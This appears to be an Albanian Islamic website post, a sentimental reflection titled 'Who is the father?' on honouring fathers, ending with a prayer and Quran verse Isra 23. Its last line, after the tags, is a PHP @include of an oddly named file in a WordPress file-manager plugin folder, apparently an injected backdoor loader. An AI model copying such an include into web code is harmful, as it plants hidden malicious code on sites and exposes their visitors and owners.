Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Kush është babai …?

Kush është babai …?

kush eshte babai

”Babai” fjale e cila më bëri me të vërtetë të qaja.
Kush është babai ? – Pyetje drejtuar studentëve te magjistraturës, pergjigjet e tyre ishin shumë te bukura porse me e bukura ishte përgjigja e Profesorit i cili tha tha:

Babai….
I veshë kepucët e tij e rrëzohesh nga madhësia e këpucëve dhe këmbët e tua të vogla humbin në to.
Vendosë syzet e tij e të duket vetja si i madhë.
Veshë këmishën e tij e të duket vetja se ke marr palton e tij.
I kërkon celësin e makinës e ëndërron se ti dhe ai I jepni bashkë makinës.
Të shkon në mendje ndonjë gjë e kotë e I bën telefon në orarin e punës, të përgjigjet me zemër të hapur e plot butësi, e ti nuk din asgjë, a i ka folur drejtori apo e ka zemëruar shoKu I punës apo shpenzimet e shumta e kanë rënduar, e ti duke I thënë…
“ Baba më sill pije kur të vish”
Të kthen përgjigje: Ta sjell babi me gjith qef vetëm se bëhu djal I mirë e mos e lodhë mamin.
Kthehet në shtëpi I lodhur nga puna, rruga, dhe harron të të sjellë kërkesën tënde.
I thua ti: Babi ku e ke pijen?
Buzëqesh dhe kthehet përsëri të shkojë të blejë pijen tënde me plot lumturi duke e harruar lodhjen e tij.

Ndërsa sot…..
Ti nuk I vesh këpucët e tij se shija e tij për veshje te duket e vjetër.
I nënvlereson rrobat, plackat dhe makinën e tij me të cilën mburreshe përpara shokëve , sepse ato nuk të shkojnë ty tani.
Fjalët e tij nuk të pëlqejnë!
Të vjen zorë nga lëvizjet dhe veprimet e tij nëse e shikojnë shokët e tu.
Kur vonohesh bëhet merak për ty e kur të bën telefon ngushtohesh, e ndoshta edhe nuk I përgjigjesh nëse përsërit telefonatën.
Kur kthehesh në shtëpi të qorton për vonesën që të bëjë të ndjesh përgjegjësi për veprimet e tua…e ti mërzitesh… vazhdon të edukojë sepse ai është kujdestar dhe cdo kujdestar do të pyetet për cka ka patur nën kujdesje.
Ti e ngren zërin duke folur me të e ai hesht…jo se ka frikë prej teje.. porse se të do e të fal gjithmonë e të tregon aftësinë e tij për të thithur nervat e tua.
Dje mezi flisje e gaboje në shumë shkronja e sot nuk të pushon askush..cfarëdo që të bëjë mos harro se ai është babai jot?
Sikur të duroi ai në fëmijërinë tënde e në kotësirat e tua edhe ti duroje në sëmundjen dhe pleqërinë e tij.
Duroje e sillu mir ndaj tij…sepse të tjerët dëshirojnë ta shikojnë babain e tyre qoftë edhe një herë.

Më pyetën: Cilin burrë do më shumë?
U thashë: “ Atë të cilin më priti nëntë muaj e më priti plot gëzim , më edukoi duke mos ia dhënë vetes dhe shëndetit të tij hakun e duhur, duk qëndruar natë të tëra zgjuar që të rregullonte cështjet e jetës sonë derisa u bëra burrë”
Ai do të mbetet dashuria më e madhe në zemrën time.

O Allah atij të cilit I ka vdek babai fale atë dhe mëshiroje, e fute në Xhenetet e Tua.
Ai I cili e ka babain gjallë. Shtoja jetën në ibadetin tënd largoja cdo prengë e furnizoje me të mira nga nuk I shkon mendja. Lësho mbi të mëshirën Tënde.
O Allah na bën të respektueshëm ndaj prindërve tanë sat ë jenë gjallë edhe mbas vdekjes së tyre.. Amin…

“Zoti yt ka dhënë urdhër të prerë që të mos adhuroni tjetër pos Tij, që të silleni në mënyrë bamirëse ndaj prindërve. Nëse njërin prej tyre, ose që të dy, i ka kapur pleqëria pranë kujdesit tënd, atëherë mos u thuaj atyre as “of – oh”, as mos u bë i vrazhdë ndaj tyre, po atyre thuaju fjalë të mira (të buta, respektuese)”. (Isra: 23)

Përktheu dhe përshtati: F. Gurra

Tags:
@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";